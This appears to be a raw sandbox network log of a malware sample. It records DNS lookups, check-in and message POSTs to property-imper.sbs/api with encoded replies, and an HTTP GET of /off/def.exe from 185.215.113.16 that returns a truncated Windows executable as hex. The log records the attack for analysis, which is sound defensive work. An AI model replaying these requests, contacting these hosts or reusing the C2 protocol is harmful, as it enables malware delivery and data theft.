                                                                                                                                                                          Nov 23, 2024 19:01:55.195286989 CET1.1.1.1192.168.2.50xb1efNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:57.977001905 CET1.1.1.1192.168.2.50x7981No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:57.977001905 CET1.1.1.1192.168.2.50x7981No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:57.977001905 CET1.1.1.1192.168.2.50x7981No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:57.978970051 CET1.1.1.1192.168.2.50xa9c6No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.164290905 CET1.1.1.1192.168.2.50xf257No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.164290905 CET1.1.1.1192.168.2.50xf257No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.164290905 CET1.1.1.1192.168.2.50xf257No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.164290905 CET1.1.1.1192.168.2.50xf257No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.187372923 CET1.1.1.1192.168.2.50x1aa9No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:01:58.187372923 CET1.1.1.1192.168.2.50x1aa9No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:05.614729881 CET1.1.1.1192.168.2.50xeea6No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:05.615283012 CET1.1.1.1192.168.2.50x70ecNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:10.958328009 CET1.1.1.1192.168.2.50x374cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:11.056543112 CET1.1.1.1192.168.2.50x97aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:18.043817043 CET1.1.1.1192.168.2.50x973cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:02:18.045644999 CET1.1.1.1192.168.2.50x7417No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:03:05.278784990 CET1.1.1.1192.168.2.50xc663No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Nov 23, 2024 19:03:05.372697115 CET1.1.1.1192.168.2.50x80a9No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          • property-imper.sbs
                                                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                                                          • otelrules.azureedge.net
                                                                                                                                                                          • fs.microsoft.com
                                                                                                                                                                          • https:
                                                                                                                                                                            • js.monitor.azure.com
                                                                                                                                                                            • wcpstatic.microsoft.com
                                                                                                                                                                          • 185.215.113.16
                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.549738185.215.113.16807288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Nov 23, 2024 19:01:34.964699030 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:36.216425896 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:36 GMT
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Content-Length: 2751488
                                                                                                                                                                          Last-Modified: Sat, 23 Nov 2024 17:33:35 GMT
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          ETag: "674211ef-29fc00"
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 bf 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                          Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`* `@ *|*`Ui` @ @.rsrc`2@.idata 8@hyqsfdet)):@vfmexbxk @*)@.taggant@`*")@
                                                                                                                                                                          Nov 23, 2024 19:01:36.216494083 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.216526031 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.216830969 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.216886997 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.216917038 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.217616081 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.217672110 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.217700958 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.218355894 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Nov 23, 2024 19:01:36.341346979 CET1236INData Raw: 99 9c 16 53 7a 90 71 24 6a ae 4f 84 aa 71 03 bc ba 33 3f 1c ce f6 72 9e a1 fe fd 06 28 c0 53 26 63 27 f0 16 77 07 11 da 3d 90 2c 10 94 b7 e3 4a 7a 85 3b 9f 88 37 03 37 23 ab 17 a9 52 ed 0c 83 30 bd 3f ff bf 79 94 48 49 0b 16 8d bf bc 11 0f cc c5
                                                                                                                                                                          Data Ascii: Szq$jOq3?r(S&c'w=,Jz;77#R0?yHI|?`V#k(ec7%ZD*!uufjYe~3X@k)@?|&{lqRO[spA8


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.549704172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:05 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                          2024-11-23 18:01:06 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:06 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=tk43es6liost3vd2dc1phr7t2v; expires=Wed, 19-Mar-2025 11:47:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Rrhjf8GmEOsS9ieQwPKv2SXR4qpMZzkKxl4fKdWbhvcpQcPaIabiMD%2Bv8Vi5j%2FIVHk9ouVjPTef4xt%2BbZJZ56%2BDscRyPHSpC5b9OZliC7KOyrhWp5GGSHWbNya07Fzl3x%2F%2FVPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e731005cef60f88-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1682997&cwnd=187&unsent_bytes=0&cid=9fdbb77a3afa459d&ts=949&x=0"
                                                                                                                                                                          2024-11-23 18:01:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                          2024-11-23 18:01:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.549705172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:08 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:08 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                          2024-11-23 18:01:09 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:09 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=psbgrf6k9t2l5ivur6he327s4j; expires=Wed, 19-Mar-2025 11:47:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hSCAFzhy%2BtI6%2FbVRP%2BRB5GCYwgh6ITkSM5anWqLAEFubmrrmkl8qKb98k60E9VxZuESLzUkQ7VwFFSMIu0Fao7xXBhlGnVksqc80VfZy3X8hJFwbrUwNSg5rjRgOuW%2BuNa5EVII%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e731013eb3b0cc8-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1759036&cwnd=225&unsent_bytes=0&cid=e9d1ebc94ee1c3ee&ts=1623&x=0"
                                                                                                                                                                          2024-11-23 18:01:09 UTC353INData Raw: 34 64 66 0d 0a 46 31 49 44 6c 71 33 4b 50 4a 4c 5a 4d 70 59 44 59 6f 57 47 4c 39 73 73 37 63 50 30 78 62 38 33 30 72 32 51 41 31 42 6e 6d 59 5a 73 63 48 57 30 6c 2f 34 51 73 4b 70 58 74 44 6b 57 39 2f 4e 4b 39 77 36 4d 70 39 62 2f 32 56 61 2b 7a 76 55 76 63 68 48 30 70 43 30 30 59 76 72 65 72 78 43 77 76 45 71 30 4f 54 6e 2b 70 45 71 31 44 74 66 68 6b 61 2f 64 56 72 37 66 38 57 67 2f 46 2f 58 6c 66 7a 35 6b 2f 73 69 70 57 50 4f 31 58 2f 4e 6d 42 2b 54 73 51 62 4a 42 68 61 37 57 36 5a 31 53 71 4a 2b 71 49 52 30 43 37 65 64 61 4d 33 44 39 6a 37 63 51 36 66 74 58 2b 43 46 59 70 2b 64 4b 75 55 43 4c 70 35 2b 74 31 31 2b 32 33 76 52 70 49 41 37 2f 37 6e 38 77 5a 2f 2f 43 6f 45 7a 2b 76 31 6a 34 59 41 33 6b 70 41 50 35 53 5a 66 68 7a 75 65 4f 5a 37 50 4f 34 33
                                                                                                                                                                          Data Ascii: 4dfF1IDlq3KPJLZMpYDYoWGL9ss7cP0xb830r2QA1BnmYZscHW0l/4QsKpXtDkW9/NK9w6Mp9b/2Va+zvUvchH0pC00YvrerxCwvEq0OTn+pEq1Dtfhka/dVr7f8Wg/F/Xlfz5k/sipWPO1X/NmB+TsQbJBha7W6Z1SqJ+qIR0C7edaM3D9j7cQ6ftX+CFYp+dKuUCLp5+t11+23vRpIA7/7n8wZ//CoEz+v1j4YA3kpAP5SZfhzueOZ7PO43
                                                                                                                                                                          2024-11-23 18:01:09 UTC901INData Raw: 70 56 37 69 73 31 76 2f 5a 42 4c 73 37 55 43 30 54 6f 4b 72 6d 61 54 64 55 72 72 56 2f 57 73 32 43 50 62 69 64 54 41 68 75 6f 2b 76 52 72 44 6a 45 4e 64 6b 45 4f 44 6f 57 2f 74 30 7a 37 37 59 76 70 31 53 76 4a 2b 71 49 54 6f 41 2b 4f 64 2b 50 32 4c 38 78 4c 70 65 34 72 31 64 38 58 4d 47 34 75 70 48 75 6c 79 46 72 35 43 6b 31 46 36 35 32 76 56 6c 63 6b 75 37 34 32 31 77 4f 62 54 75 70 56 58 38 73 55 66 30 49 52 2b 70 2f 51 32 2b 51 73 2f 35 31 71 50 63 55 62 48 62 2f 47 38 32 43 66 33 71 65 44 39 6e 2f 73 2b 76 56 50 69 7a 55 66 6c 71 44 2b 66 68 51 4c 31 49 67 36 43 54 35 35 4d 56 74 38 65 79 4f 58 49 72 2f 4f 64 6e 63 6c 54 33 77 61 5a 5a 35 76 74 50 75 6e 68 41 34 4f 67 4e 34 51 36 42 70 4a 6d 31 33 45 65 31 30 65 42 74 4e 77 50 32 35 33 73 77 5a 50 50
                                                                                                                                                                          Data Ascii: pV7is1v/ZBLs7UC0ToKrmaTdUrrV/Ws2CPbidTAhuo+vRrDjENdkEODoW/t0z77Yvp1SvJ+qIToA+Od+P2L8xLpe4r1d8XMG4upHulyFr5Ck1F652vVlcku7421wObTupVX8sUf0IR+p/Q2+Qs/51qPcUbHb/G82Cf3qeD9n/s+vVPizUflqD+fhQL1Ig6CT55MVt8eyOXIr/OdnclT3waZZ5vtPunhA4OgN4Q6BpJm13Ee10eBtNwP253swZPP
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 33 66 38 64 0d 0a 35 73 6c 6e 6d 61 77 7a 70 39 6b 43 7a 53 34 47 74 6b 36 6a 64 56 4c 48 52 2b 47 70 79 53 37 76 6a 62 58 41 35 74 4f 43 6c 54 75 4b 78 57 2b 55 6a 4e 65 54 71 51 37 35 59 7a 37 37 59 76 70 31 53 76 4a 2b 71 49 54 6b 44 39 2b 68 31 4e 6e 50 36 77 4c 70 55 34 72 39 65 38 47 30 4f 37 75 6c 43 76 46 79 4c 6f 59 53 6d 32 46 4b 2b 30 75 42 6b 63 6b 75 37 34 32 31 77 4f 62 54 31 6e 46 6e 67 71 6c 65 32 56 41 50 70 36 6b 71 76 44 70 44 76 6a 2b 66 61 57 66 43 48 73 6d 49 2b 43 50 4c 68 65 69 4a 72 2b 4d 36 36 57 66 6d 79 57 76 56 76 44 2b 7a 6f 53 4b 74 46 67 4b 6d 5a 70 74 42 59 75 39 76 79 49 58 78 46 2f 50 77 31 61 43 48 56 77 71 64 4d 38 36 6f 53 77 57 49 4f 36 65 4e 62 2b 56 48 42 75 4e 61 67 30 52 58 6f 6e 2f 4e 74 50 67 54 30 34 6e 38 34
                                                                                                                                                                          Data Ascii: 3f8d5slnmawzp9kCzS4Gtk6jdVLHR+GpyS7vjbXA5tOClTuKxW+UjNeTqQ75Yz77Yvp1SvJ+qITkD9+h1NnP6wLpU4r9e8G0O7ulCvFyLoYSm2FK+0uBkcku7421wObT1nFngqle2VAPp6kqvDpDvj+faWfCHsmI+CPLheiJr+M66WfmyWvVvD+zoSKtFgKmZptBYu9vyIXxF/Pw1aCHVwqdM86oSwWIO6eNb+VHBuNag0RXon/NtPgT04n84
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 78 61 38 4c 5a 62 2b 6d 38 4a 36 2b 78 42 76 6c 79 43 70 4a 36 74 31 46 43 38 30 76 46 7a 4d 51 53 37 71 6a 55 33 65 62 53 58 36 48 6e 44 6a 48 4f 30 66 6b 37 2b 70 45 71 31 44 74 66 68 6c 36 2f 61 57 37 54 4e 2f 48 4d 38 41 76 76 69 66 54 68 6d 2b 4d 47 6d 54 50 69 36 55 50 70 75 43 4f 37 67 54 4c 31 4b 67 36 62 57 36 5a 31 53 71 4a 2b 71 49 52 6f 47 34 66 34 33 48 6d 72 30 79 4c 68 49 36 2f 74 50 75 6e 68 41 34 4f 67 4e 34 51 36 4c 71 70 79 75 33 6c 79 30 30 76 4a 6f 50 51 7a 7a 36 58 30 69 59 50 37 64 72 46 76 78 74 46 72 77 61 51 7a 6f 36 45 6d 72 52 63 2f 76 31 71 44 46 46 65 69 66 30 6d 6f 6b 4a 75 6e 32 4e 53 38 76 37 59 2b 76 55 72 44 6a 45 50 31 74 41 65 62 75 53 37 4a 4c 67 71 47 54 72 64 70 5a 73 4e 2f 78 5a 7a 51 49 38 2b 78 35 50 47 4c 35 79
                                                                                                                                                                          Data Ascii: xa8LZb+m8J6+xBvlyCpJ6t1FC80vFzMQS7qjU3ebSX6HnDjHO0fk7+pEq1Dtfhl6/aW7TN/HM8AvvifThm+MGmTPi6UPpuCO7gTL1Kg6bW6Z1SqJ+qIRoG4f43Hmr0yLhI6/tPunhA4OgN4Q6Lqpyu3ly00vJoPQzz6X0iYP7drFvxtFrwaQzo6EmrRc/v1qDFFeif0mokJun2NS8v7Y+vUrDjEP1tAebuS7JLgqGTrdpZsN/xZzQI8+x5PGL5y
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 39 58 76 56 6e 44 4f 71 6b 41 2f 6c 4a 6c 2b 48 4f 35 2f 70 50 76 64 6e 6c 63 41 63 43 2b 37 55 31 4c 79 2f 74 6a 36 39 53 73 4f 4d 51 2b 57 30 4b 36 75 46 4a 73 55 6d 4d 6f 4a 71 6a 30 46 69 30 31 76 5a 6b 49 42 66 39 36 6e 55 2f 62 2f 76 44 75 6c 44 31 75 31 79 30 4c 30 44 67 2f 41 33 68 44 72 36 32 6c 75 66 43 47 36 6d 66 39 57 31 79 58 62 76 72 65 43 4a 74 2b 38 2b 70 58 66 53 77 56 2f 4a 6e 41 65 54 68 54 72 78 49 6a 71 47 61 72 64 70 64 75 74 48 2f 5a 7a 59 44 2f 61 51 37 63 47 62 73 6a 2f 41 65 77 72 5a 65 2f 57 49 47 36 76 4a 6c 69 41 36 51 37 34 2f 6e 32 6c 6e 77 68 37 4a 6c 4f 51 33 33 34 58 30 31 59 50 7a 46 6f 46 48 2f 71 56 48 37 61 41 66 73 36 55 4b 33 53 34 47 7a 6b 61 7a 57 58 62 6e 52 39 43 46 38 52 66 7a 38 4e 57 67 68 77 73 79 6d 56 65
                                                                                                                                                                          Data Ascii: 9XvVnDOqkA/lJl+HO5/pPvdnlcAcC+7U1Ly/tj69SsOMQ+W0K6uFJsUmMoJqj0Fi01vZkIBf96nU/b/vDulD1u1y0L0Dg/A3hDr62lufCG6mf9W1yXbvreCJt+8+pXfSwV/JnAeThTrxIjqGardpdutH/ZzYD/aQ7cGbsj/AewrZe/WIG6vJliA6Q74/n2lnwh7JlOQ334X01YPzFoFH/qVH7aAfs6UK3S4GzkazWXbnR9CF8Rfz8NWghwsymVe
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 63 77 48 6f 70 41 50 35 53 5a 66 68 7a 75 66 73 51 37 66 59 2f 53 4d 62 41 75 44 6c 66 7a 4e 71 2b 49 2b 33 45 4f 6e 37 56 2f 67 68 57 4b 66 70 51 62 52 4b 6e 61 32 57 70 39 52 53 75 73 33 39 62 6a 38 47 2b 2b 46 6e 4d 58 50 37 78 4b 31 64 39 4c 52 66 2b 47 6b 4b 70 36 6f 4e 76 6c 62 50 2b 64 61 4c 33 6b 53 36 6e 64 56 37 4a 41 4c 33 39 58 34 39 62 62 54 51 35 6b 65 77 76 46 79 30 4f 55 44 6e 35 55 43 72 53 34 36 72 6e 4b 72 56 57 72 58 61 2f 57 55 32 44 76 58 32 65 7a 39 68 38 73 53 70 57 2f 4f 77 57 76 70 6f 45 71 65 71 44 62 35 57 7a 2f 6e 57 6a 63 5a 55 76 64 4f 77 54 7a 6b 54 2f 4b 5a 55 50 6d 72 7a 77 37 34 65 37 2f 56 4a 74 47 59 4d 70 37 77 4e 73 45 43 44 6f 70 47 76 31 56 43 77 31 50 4a 75 4f 41 76 38 39 6e 38 38 61 2b 62 41 71 31 50 30 74 6c 72
                                                                                                                                                                          Data Ascii: cwHopAP5SZfhzufsQ7fY/SMbAuDlfzNq+I+3EOn7V/ghWKfpQbRKna2Wp9RSus39bj8G++FnMXP7xK1d9LRf+GkKp6oNvlbP+daL3kS6ndV7JAL39X49bbTQ5kewvFy0OUDn5UCrS46rnKrVWrXa/WU2DvX2ez9h8sSpW/OwWvpoEqeqDb5Wz/nWjcZUvdOwTzkT/KZUPmrzw74e7/VJtGYMp7wNsECDopGv1VCw1PJuOAv89n88a+bAq1P0tlr
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 4f 67 4e 34 51 36 50 70 5a 71 6b 32 6c 75 2f 30 76 31 6d 4f 51 72 78 36 6d 63 2f 5a 50 7a 44 6f 46 50 69 73 56 72 6d 61 41 6e 71 36 6b 57 72 54 63 2f 76 31 71 44 46 46 65 69 66 77 47 73 78 43 65 33 70 65 6e 42 2b 75 74 62 6f 57 66 7a 37 43 4c 52 7a 45 75 66 76 54 62 35 41 6e 61 43 65 71 4e 64 56 74 74 54 34 59 6a 73 42 39 65 31 7a 4d 57 7a 31 7a 71 68 62 38 4c 4a 43 2b 53 46 4f 70 2b 4e 56 2b 52 62 50 6c 70 71 73 37 46 61 6d 6e 2b 30 76 4b 30 58 38 36 44 56 6f 49 66 58 64 70 56 62 30 75 31 33 79 61 67 48 6d 35 30 32 35 54 59 2b 6b 6e 61 6a 62 55 72 33 56 2b 32 67 67 44 66 2f 32 64 54 78 6c 74 49 48 6f 57 65 6a 37 43 4c 52 52 41 2b 7a 6f 54 62 52 62 7a 37 37 59 76 70 31 53 76 4a 2b 71 49 54 6f 4f 38 4f 4a 2b 4d 32 4c 36 78 4b 4a 52 2f 37 46 57 38 6d 6b 46
